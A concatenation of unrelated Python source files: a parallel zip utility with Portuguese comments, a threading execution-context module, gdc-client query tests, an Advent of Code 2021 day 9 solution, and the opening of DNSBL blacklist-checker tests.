"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
)
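# A minimal sketch of a functional test entry point built on these helpers,
# assuming this module is importable as galaxy_test.driver.driver_util; the
# driver subclass below is hypothetical. drive_test() instantiates the driver,
# runs the nose suite, and exits with an appropriate status code.
#
#     from galaxy_test.driver.driver_util import GalaxyTestDriver, drive_test
#
#     class FrameworkToolTestDriver(GalaxyTestDriver):
#         """Serve the bundled framework sample tools for the test run."""
#         framework_tool_and_types = True
#
#     if __name__ == "__main__":
#         drive_test(FrameworkToolTestDriver)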
|
pzip.py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import argparse
from zipfile import ZipFile
from multiprocessing import Process, Value, Semaphore, Array
from ctypes import c_char_p
import signal
import time
import os
import sys
import datetime
import struct
totalFiles = Value('i', 0)
totalFilesSem = Semaphore(1)
errorChecker = Value('i', 0)
volume = Value("i", 0)
pointer = Value("i", 0)
sem = Semaphore(1)
def handle_files(files, t, f, names, times, sizes, pid):
"""
Faz zip e unzip de ficheiros.
Requires: files é uma lista de ficheiros, t é um boolean, f é uma string ou None, names, times, sizes e pid
sao None ou Array()
Ensures: Zip/unzip de ficheiros.
"""
while pointer.value < len(files) and ((errorChecker.value == 0 and t) or not t) and errorChecker.value < 2:
        # In -t mode we can only continue if errorChecker is 0 (no error) and there are still files left
        # Outside -t mode we can continue without restriction while there are files left
time1 = time.time()
        sem.acquire()  # Mutex to guarantee that each file is only zipped by one process
iterator = pointer.value
pointer.value += 1
sem.release()
        if iterator < len(files):  # iterator is the index of the file this process should handle
File = files[iterator]
            if os.path.isfile(File):  # Check that the file exists
if mode == 'c':
with ZipFile(File + '.zip', 'w') as zipfile:
zipfile.write(File) # Zip
else:
with ZipFile(File, 'r') as zipfile:
zipfile.extractall('.') # Unzip
totalFilesSem.acquire()
totalFiles.value += 1
file_size = (os.path.getsize(File + '.zip') if mode == 'c' else os.path.getsize(File.strip(".zip")))
volume.value += file_size
totalFilesSem.release()
                # Store process and file information in the arrays so they can be written to the binary log file
if f is not None:
names[iterator] = File
times[iterator] = time.time() - time1
sizes[iterator] = file_size
pid[iterator] = os.getpid()
else:
print "O ficheiro", File, "não existe." # Se nao exister, avisa o utilizador
errorChecker.value = 1 # Ha erro e a flag atualiza
def sigint_handler(sig, NULL):
"""
Handler de sinal de SO SIGINT para terminar a execucao
"""
errorChecker.value = 2 # Faz com que parem de processar ficheiros
def sigalrm_handler(sig, NULL):
"""
Handler de sinal de SO SIGALRM que imprime o estado do programa
"""
print "Foram", ("comprimidos" if mode == 'c' else "descomprimidos"), \
str(totalFiles.value), "ficheiros."
print "Foram", ("comprimidos" if mode == 'c' else "descomprimidos"), \
str(volume.value / 1024), "Kb de ficheiros"
print "Tempo de execucao:", (time.time() - timer) * 1000
def log_writer(files, date, end_timer, pid, names, sizes, times, f):
"""
Escreve um ficheiro log binario com os estados da execucao do programa
Requires: self object
Ensures: A escrita de um ficheiro binario log
"""
status = []
for i in range(len(files)):
if pid[i] != 0:
status.append([pid[i], names[i], sizes[i], times[i]])
with open(f, "wb") as fw:
for num in [date.day, date.month, date.year, date.hour,
date.minute, date.second, date.microsecond]:
fw.write(struct.pack("i", num)) # Escrever a data de comeco
fw.write(struct.pack("d", end_timer)) # Escrever data do fim
for stat in status:
# Para cada ficheiro e' escrito na memoria sequencialmente
size = len(bytes(stat[1]))
fw.write(struct.pack("i", stat[0])) # pid do processo que trabalho no ficheiro
fw.write(struct.pack("i", size))
fw.write(struct.pack("%ds" % size, stat[1])) # Nome do ficheiro
fw.write(struct.pack("i", stat[2])) # Tamanho do ficheiro apos
fw.write(struct.pack("d", stat[3])) # Tempo que demorou a comprimir/descomprimir
def main(args, timer):
files = args.files
t = args.t
f = args.f
date = datetime.datetime.now()
    names = (None if f is None else Array(c_char_p, len(files)))  # names, sizes and times are used as information lists in case
    sizes = (None if f is None else Array("i", len(files)))  # the binary log file has to be written
times = (None if f is None else Array("d", len(files)))
pid = (None if f is None else Array("i", len(files)))
    signal.signal(signal.SIGINT, sigint_handler)  # SIGINT (CTRL^C) terminates program execution
if args.a is not None:
        signal.signal(signal.SIGALRM, sigalrm_handler)  # Signal handler
        signal.setitimer(signal.ITIMER_REAL, 1, args.a)  # Timer: every 'a' seconds a SIGALRM signal is sent and caught
processos = [Process(target=handle_files, args=(files, t, f, names, times, sizes, pid)) for _
in range((args.parallel[0] if args.parallel[0] <= len(files) else len(files)))]
for i in range(len(processos)):
processos[i].start()
for i in range(len(processos)):
processos[i].join()
end_timer = time.time() - timer
if f is not None:
log_writer(files, date, end_timer, pid, names, sizes, times, f)
print "Foram", ("comprimidos" if mode == 'c' else "descomprimidos"), str(totalFiles.value), "ficheiros."
print "Foram", ("comprimidos" if mode == 'c' else "descomprimidos"), str(volume.value / 1024), \
"Kb de ficheiros"
print "Tempo de execucao:", end_timer
"""
Argparse e' usado para fazer parsing dos argumentos da linha de comando.
"""
timer = time.time()
description = 'Comprime e descomprime conjuntos de ficheiros paralelamente'
parser = argparse.ArgumentParser(description=description)
group = parser.add_mutually_exclusive_group(required=True)  # Mutually exclusive group for -c or -d (zip or unzip)
group.add_argument("-c", dest="mode", help="Comprimir ficheiros", action="store_const", const="c")
group.add_argument("-d", dest="mode", help="Descomprimir ficheiros", action="store_const", const="d")
parser.add_argument("-p", metavar="processes", dest="parallel", help="Numero de processos permitidos", type=int,
nargs=1, default=[1])
parser.add_argument("-t", dest="t", help="Obriga a suspensao de execucao caso um ficheiro seja "
"nao existente", action="store_true") # True or false para modo t
parser.add_argument("-a", dest="a", help="Escreve o estado da execucao a cada intervalo de tempo "
"indicado", type=int)
parser.add_argument("-f", dest="f", help="Guardar o histórico da execucao do programa num ficheiro binario indicado"
, type=str)
parser.add_argument("files", type=str, metavar="files", nargs="*", help="Ficheiros para comprimir/descomprimir")
args = parser.parse_args()
if not args.files and not sys.stdin.isatty():
    # stdin.isatty returns False if there is something on stdin, i.e. pzip -c|-d < file.txt
args.files = filter(lambda x: x != '', sys.stdin.read().split("\n"))
elif not args.files and sys.stdin.isatty():
    # If there is nothing on stdin and no files were specified, ask the user
args.files = filter(lambda x: x != '', sys.stdin.read().split("\n"))
if args.parallel[0] <= 0:
parser.error("Tem de criar 1 ou mais processos")
mode = args.mode
main(args, timer)
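# Example invocations (a sketch based on the argparse options defined above;
# file names are illustrative only): compress two files with 4 worker processes,
# printing status every 2 seconds and writing a binary history file, or
# decompress with -t so execution stops at the first missing file:
#
#     python pzip.py -c -p 4 -a 2 -f history.bin file1.txt file2.txt
#     python pzip.py -d -t file1.txt.zip file2.txt.zip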
|
execution_context.py
|
import abc
import threading
import six
@six.add_metaclass(abc.ABCMeta)
class ExecutionContext(object):
"""Base abstract execution context class."""
@abc.abstractmethod
def run(self, func, *args, **kwargs):
pass
class GeventExecutionContext(ExecutionContext):
"""Execution context that run background function as a Greenlet.
gevent monkey patching must be done by user.
"""
def run(self, func, *args, **kwargs):
"""Run given function in a Greenlet."""
import gevent
gevent.spawn(func, *args, **kwargs)
gevent.sleep()
class ThreadingExecutionContext(ExecutionContext):
"""Execution context that run background function as a OS Thread."""
def run(self, func, *args, **kwargs):
"""Run given function in a daemon OS thread."""
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
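# A minimal usage sketch: run a toy task in the background with the
# threading-based context. Guarded so that importing this module spawns
# nothing; the short sleep only gives the daemon thread time to print
# before the interpreter exits.
if __name__ == "__main__":
    import time

    def _demo_task(name):
        # Toy background task used only for this sketch.
        print("hello from %s" % name)

    ThreadingExecutionContext().run(_demo_task, "background-thread")
    time.sleep(0.1)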
|
test_query.py
|
import time
from multiprocessing import Process
from unittest import TestCase
import pytest
from gdc_client.parcel.const import HTTP_CHUNK_SIZE
import mock_server
from conftest import uuids
from gdc_client.query.index import GDCIndexClient
from gdc_client.query.versions import _chunk_list, get_latest_versions
# default values for flask
server_host = "http://127.0.0.1"
server_port = "5000"
# same as --server flag for gdc-client
base_url = server_host + ":" + server_port
class QueryIndexTest(TestCase):
def setUp(self):
self.server = Process(target=mock_server.app.run)
self.server.start()
# give the server time to start
time.sleep(2)
def tearDown(self):
self.server.terminate()
############ not set ############
def test_no_metadata_get_related_files(self):
index = GDCIndexClient(uri=base_url)
results = index.get_related_files("small")
assert results == []
def test_no_metadata_get_annotations(self):
index = GDCIndexClient(uri=base_url)
results = index.get_annotations("small")
assert results == []
def test_no_metadata_get_md5sum(self):
index = GDCIndexClient(uri=base_url)
results = index.get_md5sum("small")
assert results == None
def test_no_metadata_get_filesize(self):
index = GDCIndexClient(uri=base_url)
results = index.get_filesize("small")
assert results == None
    def test_no_metadata_get_access(self):
index = GDCIndexClient(uri=base_url)
results = index.get_access("small")
assert results == None
############ mock metadata ############
def test_full_mock_get_metadata(self):
index = GDCIndexClient(uri=base_url)
index._get_metadata(["small"])
assert index.get_access("small") == uuids["small"]["access"]
assert index.get_filesize("small") == uuids["small"]["file_size"]
assert index.get_md5sum("small") == uuids["small"]["md5sum"]
assert index.get_related_files("small") == uuids["small"]["related_files"]
assert index.get_annotations("small") == uuids["small"]["annotations"]
def test_no_rel_no_ann_mock_get_metadata(self):
index = GDCIndexClient(uri=base_url)
index._get_metadata(["small_no_friends"])
assert (
index.get_access("small_no_friends") == uuids["small_no_friends"]["access"]
)
assert (
index.get_filesize("small_no_friends")
== uuids["small_no_friends"]["file_size"]
)
assert (
index.get_md5sum("small_no_friends") == uuids["small_no_friends"]["md5sum"]
)
assert index.get_related_files("small_no_friends") == []
assert index.get_annotations("small_no_friends") == []
def test_ann_mock_get_metadata(self):
index = GDCIndexClient(uri=base_url)
index._get_metadata(["small_ann"])
assert index.get_access("small_ann") == uuids["small_ann"]["access"]
assert index.get_filesize("small_ann") == uuids["small_ann"]["file_size"]
assert index.get_md5sum("small_ann") == uuids["small_ann"]["md5sum"]
assert index.get_related_files("small_ann") == []
assert index.get_annotations("small_ann") == uuids["small_ann"]["annotations"]
def test_rel_mock_get_metadata(self):
index = GDCIndexClient(uri=base_url)
index._get_metadata(["small_rel"])
assert index.get_access("small_rel") == uuids["small_rel"]["access"]
assert index.get_filesize("small_rel") == uuids["small_rel"]["file_size"]
assert index.get_md5sum("small_rel") == uuids["small_rel"]["md5sum"]
assert (
index.get_related_files("small_rel") == uuids["small_rel"]["related_files"]
)
assert index.get_annotations("small_rel") == []
############ mock separate small files (smalls) ############
def test_small_full_separate_small_files(self):
""" Currently if a file has related or annotation files
the dtt processes it as if it were a big file so that
it goes through the old method of downloading,
regardless of size.
NOTE: This will probably change in the future.
"""
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(["small"], HTTP_CHUNK_SIZE)
assert index.get_access("small") == uuids["small"]["access"]
assert index.get_filesize("small") == uuids["small"]["file_size"]
assert index.get_md5sum("small") == uuids["small"]["md5sum"]
assert index.get_related_files("small") == uuids["small"]["related_files"]
assert index.get_annotations("small") == uuids["small"]["annotations"]
assert bigs == ["small"]
assert smalls == []
def test_small_no_rel_no_ann_separate_small_files(self):
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(["small_no_friends"], HTTP_CHUNK_SIZE)
assert (
index.get_access("small_no_friends") == uuids["small_no_friends"]["access"]
)
assert (
index.get_filesize("small_no_friends")
== uuids["small_no_friends"]["file_size"]
)
assert (
index.get_md5sum("small_no_friends") == uuids["small_no_friends"]["md5sum"]
)
assert index.get_related_files("small_no_friends") == []
assert index.get_annotations("small_no_friends") == []
assert bigs == []
assert smalls == [["small_no_friends"]]
def test_small_invalid_separate_small_files(self):
""" If no metadata can be found about a file, attempt a
download using the big file method
"""
invalid = "invalid uuid"
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files([invalid], HTTP_CHUNK_SIZE)
assert index.get_access(invalid) == None
assert index.get_filesize(invalid) == None
assert index.get_md5sum(invalid) == None
assert index.get_related_files(invalid) == []
assert index.get_annotations(invalid) == []
assert bigs == [invalid]
assert smalls == []
############ mock separate small files (bigs) ############
def test_big_full_separate_small_files(self):
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(["big"], HTTP_CHUNK_SIZE)
assert index.get_access("big") == uuids["big"]["access"]
assert index.get_filesize("big") == uuids["big"]["file_size"]
assert index.get_md5sum("big") == uuids["big"]["md5sum"]
assert index.get_related_files("big") == uuids["big"]["related_files"]
assert index.get_annotations("big") == uuids["big"]["annotations"]
assert bigs == ["big"]
assert smalls == []
############ mock separate small files (bigs) ############
def test_big_and_small_full_separate_small_files(self):
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(["big", "small"], HTTP_CHUNK_SIZE)
assert index.get_access("big") == uuids["big"]["access"]
assert index.get_filesize("big") == uuids["big"]["file_size"]
assert index.get_md5sum("big") == uuids["big"]["md5sum"]
assert index.get_related_files("big") == uuids["big"]["related_files"]
assert index.get_annotations("big") == uuids["big"]["annotations"]
assert index.get_access("small") == uuids["small"]["access"]
assert index.get_filesize("small") == uuids["small"]["file_size"]
assert index.get_md5sum("small") == uuids["small"]["md5sum"]
assert index.get_related_files("small") == uuids["small"]["related_files"]
assert index.get_annotations("small") == uuids["small"]["annotations"]
# if a uuid has related files or annotations then they
# are downloaded as big files
assert set(bigs) == set(["big", "small"])
assert smalls == []
def test_big_and_small_no_rel_no_ann_separate_small_files(self):
index = GDCIndexClient(uri=base_url)
bigs, smalls = index.separate_small_files(
["big_no_friends", "small_no_friends"], HTTP_CHUNK_SIZE
)
assert index.get_access("big_no_friends") == uuids["big_no_friends"]["access"]
assert (
index.get_filesize("big_no_friends") == uuids["big_no_friends"]["file_size"]
)
assert index.get_md5sum("big_no_friends") == uuids["big_no_friends"]["md5sum"]
assert index.get_related_files("big_no_friends") == []
assert index.get_annotations("big_no_friends") == []
assert (
index.get_access("small_no_friends") == uuids["small_no_friends"]["access"]
)
assert (
index.get_filesize("small_no_friends")
== uuids["small_no_friends"]["file_size"]
)
assert (
index.get_md5sum("small_no_friends") == uuids["small_no_friends"]["md5sum"]
)
assert index.get_related_files("small_no_friends") == []
assert index.get_annotations("small_no_friends") == []
assert bigs == ["big_no_friends"]
assert smalls == [["small_no_friends"]]
@pytest.mark.parametrize("case", [range(1), range(499), range(500), range(1000),])
def test_chunk_list(case):
for chunk in _chunk_list(case):
assert len(chunk) <= 500
@pytest.mark.parametrize(
"ids, latest_ids, expected",
[
(["foo", "bar"], ["foo", "baz"], {"foo": "foo", "bar": "baz"}),
(["1", "2", "3"], ["a", "b", "c"], {"1": "a", "2": "b", "3": "c"}),
(["1", "2", "3"], ["a", "b", None], {"1": "a", "2": "b", "3": "3"}),
],
)
def test_get_latest_versions(versions_response, ids, latest_ids, expected):
url = "https://example.com"
versions_response(url + "/files/versions", ids, latest_ids)
result = get_latest_versions(url, ids)
assert result == expected
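# For reference, a sketch of the chunking behaviour exercised by
# test_chunk_list above, assuming a fixed maximum chunk size of 500 (the real
# _chunk_list in gdc_client.query.versions may differ in signature):
#
#     def chunk_list(ids, chunk_size=500):
#         ids = list(ids)
#         for i in range(0, len(ids), chunk_size):
#             yield ids[i:i + chunk_size]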
|
day9.py
|
# https://adventofcode.com/2021/day/9
import copy
from bisect import bisect_left
import re, os, sys
from itertools import chain
import math
from typing import DefaultDict, final
import time
from collections import Counter, defaultdict
from threading import Thread, Lock
input2="""9897656789865467895698765469899988672134598894345689864101378965457932349943210987654789653198789434
8789542499996878954329984398789976561012987789245678953212567892345791998899329899765678969997668912
7678943978987989965998993297649875432129876567956789864487678991056899877778939769886789998766457899
4578999868998996899867894976532986543299876476897899987569899989167898766567898654998898998655345678
2456987657679535679756799988643498657987654345789978899789998878998919954349997543219967987543237889
1234896545568986798645678999754989767898765456998769759899987765789329863238898659301256798793156891
2346789432379997987434689489899879898919876567899954346998796434678997642127789798512345989989247892
8756894210998989876545694378987868999101998688999863238987684323457789751015678987654459878678956994
9769995679876978998656789469876957893212999899989764649876576212345678953223489698866598754567897989
9878989989885467899787896598765648789329876959879986768985432101567789998654599549977987543468998978
3989879897654345689998998679954324595498754347669897979699564323459998949765678923989295432389989567
2997669789731287899899649799878212989987543233456789897598765434569767959878789313993197643578965456
9876548678954345997678998998965359878995432102345898795439896556978956899989895429894298754567989967
9754334567895456789567987897895498769896654233457987689649987667989349989999976598789349865678999898
8843212689986687993479876756789987656789999354569698789798998798996498679889988987679459996989239799
7654303568987798932349965345690976543245878965689459899987899899459987598679299998598998989993198677
9965214589298999421298764234892987632124567899893234999896757996598796476599101976467987979954989556
9876423499349988942359982123899876543012568998990123598765346989987654323478919765359896868899876434
9987834568959876899494321015789987654423458987781349987544235677898773212467899854298795756799764323
8798945679998975697985432123456799797634567896532398765432136456987654543588978975697654345878954212
6569987989897854586976543434589899898765778999994569976543012345699896698678967896989543234667994334
4323599999765632324989876565678935999876889998789678998652134456789998789789656799976532123456789765
3212678998654321012497987676799323497989996897678989998543445967997659899895346898798943434678999876
5323799998776432423456798989893214986797965986599999897654597888976545998921234987659975665789875987
5435678989886543434567899699954399865456797998989999798975679999987631987654345799543986796789653498
6547899767987656756778985467895987654357789219878797549986998921299890198765489898752397898997621359
7656999348999987897899876579999898983234679109767689920199887990123989989987568999643498959876533578
9767898769987899998986988989987689876123793298656577891298796789939878976597679998759979347987897689
0978999898776878999765399999976467965234999987545456792987665667898769897498989899898765456899989797
1999686999654767897654239899897379894349898765432345789876543456789456789329595789999876567988778965
9765534498743456899761098756789298789498789877521234568997431367890239899939424699998997879876567893
7654321239654569989943199645678999688997678988432345789789545689965498999898935988977898989865438942
8969210149875698779899986432349997567789499996544656795678957897896987898767899976756779995987546891
9898991268989987667678964321259986455679989987655767893567898956989876987656998765634567894398656789
8796989357899986554567893210198998234598776498789878912379939347978945698768987654323979976498787891
7645678968999975423589999321297986123987654339891989701588921299866734569979498962109898997569898910
8958789989998764312399998432986544016799543210910196532347893987654321368989329879298787898978929921
9769896599987655503457897553497432135698765432399987648656789499965873456993210998987656789989939892
7978965439876543217568998664987643446999876543478999759867892349876754567894329987542545691299899789
6989753212987654328678959989999987556899997664567899867999943458987876989965998765431236789498788678
5699975423498765449789543498965398698998998789678934979878956567998989990299879976742347999998679456
4579896534569896559895432346794298789877899898789013598867897678999998989987667988755458949876542367
3456798695678998678976544756891019899965789929992129987756789789787987867896545699766569439998956459
2348989989789989989987656897893434998754599545943298985645689897656986745899656899898678998989998567
1459879878999876592198987898964565989853678987894987674434568999749875434668968965929789987878987678
2598764267899986432019899999995679876542357998976986543223478998767976323456899654319898875468998989
4599879456789997543198778999989798764321345899989987664101249019879765414597968943101997654345989991
5988998968899898994987656789878999986430156789998698876832389323989986205689547894312987643234678990
9876987899976789789998767898765798765321269899876569997844678999999854319893236789323498753012399989
9754996899764244678959878999874859896442345789754323459998799878998765623989125899976569872123459878
9899875798943123579543999986543236987554567997654314368999892367899876754578934999898698943934569965
2987654987892013468932123499432125697665678999542101267987921257943988896679765698789987899895798754
3986543456794254778921019998954014598779799798653212346795210146792999987989879987679996989789987653
9875432345895345679543198787943123459989895698764423557984321235699765498999989876498785667679876542
2976983466795457799765987656964236598992924579876534989875432545989876329568996985349653446578987321
0989876567896768899876899767895347987891013468987975678987643459879998213467895695498742323459765435
1996997678998879989989999898976459876789123569098987789699776598765432109598996986569871015568977656
9875789789459989778999987999987598785468997679129898994566987679886545298989987897698762123459988767
8754679890345697669999875798998698654345689789234789543455799789998667987879998959797654255678999878
7543467991246789556987654567899899773298789896545678962434699898989879896567899539898765345689999989
8932345789757894345699765698932999974349899987858789910123988937678999765457895410999876789789898899
6521234599767892123469896989321298765999969998769897891239876723478998964346896321299987899895687799
7434345678978943014598989878935679976789458919878956792349765212567996654235789434989298965934545678
6545456989989432123987678967956789297992346901989545989998754201789875743124589665679129654321234569
7757567899997544539998789656897895498976469899895439877839765329899754321012678998798998765432345678
8767779987987656678929893245789999989899598765789921965321965445698765532343489999987769887674689799
9988989996598879789537942126897678976788987644686899975432987566789989763456789899876653998765678999
3299398965439998996545693437956569865567898632345678976545699978993599854667896798765432109876799989
2101267897546987898756989548943497654456789543956789597656901989432398765678945989997543212989899879
4212356998969996789899878959542349873247899859897894498969893496741349876789239876987655344599999868
5434567899198865567989759894321998989356798769799942349898789595432345987892123985498965455678998659
9656678999097654459878547789499876599967899998678921298797679987549976798999012494309876567789999543
8997889898998543267965436689987985439878999876567890987654598998998798999998923989212987679899898932
7789998757987653129754324578965699210989998765457991299843467899897689895987899878964598789999787893
5679987649876543019895412399954598462398999874346789987652359998786576794986799767895789894299696794
4599876434987432123976543467893497654457890975487995699764467986531345689765987656999899999987575989
5789864329876554994987674578932398765689932976699954349865879598765456899854399769899989998765464578
6899985410997689789098789689321539878789993987789893239878989459976567998743210998799979889954323567
7999878324989798679299898795430123989896789998995789145989991345987678999654321297698665767895434579
8998765439878986598987959896542234599945689879434679245996892399898889498766532976569543556789875699
9999897699765434497896545987665465689767898965323478959854953987679994349877659876398932346895986988
9987998987654323356799536599879878899899987899212367998743899876567895457999878985497893767994299877
9876599998763201245678923478989989954999976778923456987632788975479986679987989799986989899989198766
5987988998775412367889214567896597899889895567894599876543567987569997899976495698775778999878997654
4699867997654323989995323779943456999778794345965989987654578998678989929894334597664667898769876543
3798755798976437899976534589432239876665689459899878698786689989989678919789219987543558789656989632
2979843459987656789997849789540198765534569598798766539899789976594569998677998765432345678932398721
9867552345998768898989998997421999854323878997659854321998998895423998976566789879643458789210987210
8954431236899879967678987996539899965534989654339767320987896796579887895465678988756669895329976521
7643210348965989654589456789659799876645678962123988649875435989998756789324789999898779976498765434
8754325459954399767894345678998678997786899894235698798994323577899645678939899998969889876599886745
9765486567893239898976212799876567899897956789986789987432101456797434578998987897653999987689999656
9877578678975699999697434987656456999989345699998992196544312345976547689977476789542458998792498767
4988989789989789996598645998642345998765456789879019987665443767897658798765324567943567899891239978
3499599899998998989999799876321245789876567899865198798986556898998767987643213479957679935942997989
2323456989877987579899989765433357894998679989764398659397698949899979998765424567898997645699876598
1012369973256996456789964987655478943249789678965499543229899538789998769986535899999698759989765467
2123498764139865323898753599877699761029896567896987642109954324567898754398876789996549898768954356
4234599753019973210987654568989789732234989478998998764398765313456998673219998899875435999857895967
5346987542198765423499868679999897654345678989219239875987654324769876543101239912954323498767976879"""
input1="""2199943210
3987894921
9856789892
8767896789
9899965678"""
class my_logger:
    def __init__(self) -> None:
        self._logfile=open('./2021/'+os.path.basename(sys.argv[0])+'.log.txt','w+')
        self._logfilemutex=Lock()
        self._enable=False  # default to disabled; write() checks this flag before logging
def write(self, line):
if not self._enable:
return
self._logfilemutex.acquire()
try:
self._logfile.write(line)
finally:
self._logfilemutex.release()
def __del__(self) -> None:
self._logfile.close()
def enable(self, e):
self._enable=e
global_logger=my_logger()
global_logger.enable(False)
class ThreadSafeData:
def __init__(self, data) -> None:
self._data=data
self._mutex=Lock()
def append(self, d):
self._mutex.acquire()
try:
self._data.append(d)
finally:
self._mutex.release()
def get_copy(self):
return_data=None
self._mutex.acquire()
try:
return_data=copy.deepcopy(self._data)
finally:
self._mutex.release()
return return_data
class WinException(BaseException):
pass
class ErrorException(BaseException):
pass
class point:
def __init__(self,x,y) -> None:
self.x=x
self.y=y
class line:
def __init__(self,coordinates) -> None:
self.point1 = point(coordinates[0], coordinates[1])
self.point2 = point(coordinates[2], coordinates[3])
def get_line_points_hor_vert(self):
        # evenly spaced integer points between the two endpoints
        # (valid for horizontal, vertical and 45-degree lines; not a full Bresenham implementation)
number_of_points=max(abs(self.point1.x - self.point2.x), abs(self.point1.y-self.point2.y))
number_of_points-=1 # adjust for end points
x_spacing=(self.point2.x-self.point1.x)/(number_of_points+1)
y_spacing=(self.point2.y-self.point1.y)/(number_of_points+1)
return [self.point1] + [point(self.point1.x + i * x_spacing, self.point1.y + i * y_spacing) for i in range(1, number_of_points+1)] + [self.point2]
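# Worked example (hedged, not executed): line([0, 0, 0, 3]).get_line_points_hor_vert()
# returns the four points (0,0), (0,1), (0,2), (0,3); for a 45-degree diagonal,
# x_spacing and y_spacing both become +/-1, so every grid cell on the segment is hit.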
class MyThread:
def __init__(self, t, mut) -> None:
self._thread=t
self._mutex=mut
def get_key(dict1, value):
for k,v in dict1.items():
if v==value:
return k
return None
def get_keys_from_len_of_key(dict1, length):
keys=[]
for k,v in dict1.items():
if len(k)==length:
keys.append(k)
return keys
def get_keys_from_len_of_value(dict1, length):
keys=[]
for k,v in dict1.items():
if len(v)==length:
keys.append(k)
return keys
def get_keys_from_value(dict1, value):
keys=[]
for k,v in dict1.items():
if v==value:
keys.append(k)
return keys
def has_all_chars(input_string, string2):
for s in string2:
if s not in input_string:
return False
return True
def get_all_indices_of_element(list1,element):
final_list=[]
for i in range(len(list1)):
if list1[i]==element:
final_list.append(i)
return final_list
#####################################################################################
lines = input1.split('\n')   # small sample input
lines = input2.split('\n')   # real puzzle input (overrides the sample above)
def funca(lines):
low_points=[]
sum_value=0
    for row, line in enumerate(lines):  # enumerate() keeps the correct row even if two rows are identical
        input=list(map(int, list(line)))
# go from smaller number to bigger until 8. there is no way 9 can be lowest point
for i in range(9):
try:
for col in get_all_indices_of_element(input, i):
lowest=i
for xdir in [c for c in [row-1, row+1] if c>=0 and c<len(lines)]:
if int(lines[xdir][col])<=i:
lowest=-1
break
if lowest>=0:
for cdir in [c for c in [col-1, col+1] if c>=0 and c<len(input)]:
if int(line[cdir])<=i:
lowest=-1
break
if lowest>=0:
sum_value+=lowest+1
low_points.append((row,col))
            except Exception as e:
                # defensive: any unexpected lookup error simply skips this digit value
                pass
print('a',sum_value)
return low_points
start=time.time()
funca(lines)
print('time',time.time()-start)
# correct ans: 607
def move_dir(lines, start_point, xinc, yinc, main_list):
prev_point=lines[start_point[0]][start_point[1]]
x=start_point[0]
y=start_point[1]
new_list=[]
while True:
x=x+xinc
y=y+yinc
if x<0 or x>=len(lines) or y<0 or y>=len(lines[0]) or lines[x][y]=='9' or int(lines[x][y])<=int(prev_point):
break
new_list.append((x,y))
prev_point=lines[x][y]
return new_list
def write_to_locked_memory(shared_data, new_data, data_mutex):
data_mutex.acquire()
try:
for p in new_data:
if p not in shared_data:
shared_data.append(p)
finally:
data_mutex.release()
def move_all_dir(low_point, lines, thread_name, main_list, data_mutex):
sub_list=[]
sub_list+=move_dir(lines, low_point, -1, 0, main_list)
sub_list+=move_dir(lines, low_point, +1, 0, main_list)
sub_list+=move_dir(lines, low_point, 0, -1, main_list)
sub_list+=move_dir(lines, low_point, 0, +1, main_list)
write_to_locked_memory(main_list, sub_list, data_mutex)
return sub_list
def thread_branch_basin(low_point, lines, thread_name, main_list, data_mutex):
local_list=move_all_dir(low_point, lines, '', main_list, data_mutex)
global_logger.write(' '.join(['\n\t',thread_name, 'len:', str(len(main_list)), str(main_list)]))
dir_threads=[]
for m in local_list:
dir_threads.append(Thread(target=thread_branch_basin, args=(m, lines, thread_name+'->->'+str(m), main_list, data_mutex)))
for t in dir_threads:
t.start()
for t in dir_threads:
t.join()
# global_logger.write(' '.join(['\n\t', thread_name, 'branch-end-len', str(len(main_list)), str(main_list)]))
def thread_basin(low_point, lines, thread_name, basin_size_list):
main_list=[low_point]
data_mutex=Lock()
thread_branch_basin(low_point, lines, thread_name, main_list, data_mutex)
basin_size_list.append(len(main_list))
start=time.time()
try:
low_points=funca(lines)
    # drop low points on the grid border, on the assumption that their basins are too small to be among the biggest
smaller_basin_points=[]
for p in low_points:
if p[0]==0 or p[0]==len(lines)-1 or p[1]==0 or p[1]==len(lines[0])-1:
smaller_basin_points.append(p)
low_points=list(set(low_points) - set(smaller_basin_points))
basin_size_list=ThreadSafeData([])
threads=[]
for p in low_points:
t=Thread(target=thread_basin, args=(p, lines, 'basin_thread-'+str(p), basin_size_list))
t.start()
threads.append(t)
for t in threads:
t.join()
data=basin_size_list.get_copy()
data.sort(reverse=True)
final_ans=1
for i in range(3):
final_ans*=data[i]
print('b', final_ans)
# correct ans: 900864
except ErrorException as e:
print('error')
print('time',time.time()-start)
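# Hedged single-threaded sketch of the same basin flood fill performed by the threads
# above (assumption: it mirrors move_dir's "strictly increasing, stop at 9" rule).
# It is defined but never called, so the script's output is unchanged.
def basin_size_bfs(grid_lines, low_point):
    from collections import deque
    seen = {low_point}
    queue = deque([low_point])
    while queue:
        x, y = queue.popleft()
        for nx, ny in ((x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)):
            if (0 <= nx < len(grid_lines) and 0 <= ny < len(grid_lines[0])
                    and (nx, ny) not in seen
                    and grid_lines[nx][ny] != '9'
                    and int(grid_lines[nx][ny]) > int(grid_lines[x][y])):
                seen.add((nx, ny))
                queue.append((nx, ny))
    return len(seen)  # number of cells in the basin, including the low point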
|
tests.py
|
import asyncio
import threading
import pytest
from .checker import DNSBLChecker, DNSBLIpChecker, DNSBLDomainChecker
from .providers import Provider
# IP TESTS
def test_checker():
checker = DNSBLIpChecker()
res = checker.check('68.128.212.240')
assert res.blacklisted
assert res.categories
assert res.detected_by
results = checker.bulk_check(['68.128.212.240', '8.8.8.8'])
# check bulk check
assert results[0].detected_by == res.detected_by
assert not results[1].blacklisted
def test_checker_ipv6():
checker = DNSBLIpChecker()
res = checker.check('2001:4860:4860::8844')
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
checker = DNSBLIpChecker(providers=[Provider('v6.fullbogons.cymru.com')])
res = checker.check('::1')
assert res.blacklisted
assert res.categories
assert res.detected_by
def test_providers():
""" Providers should not mark google ip as bad """
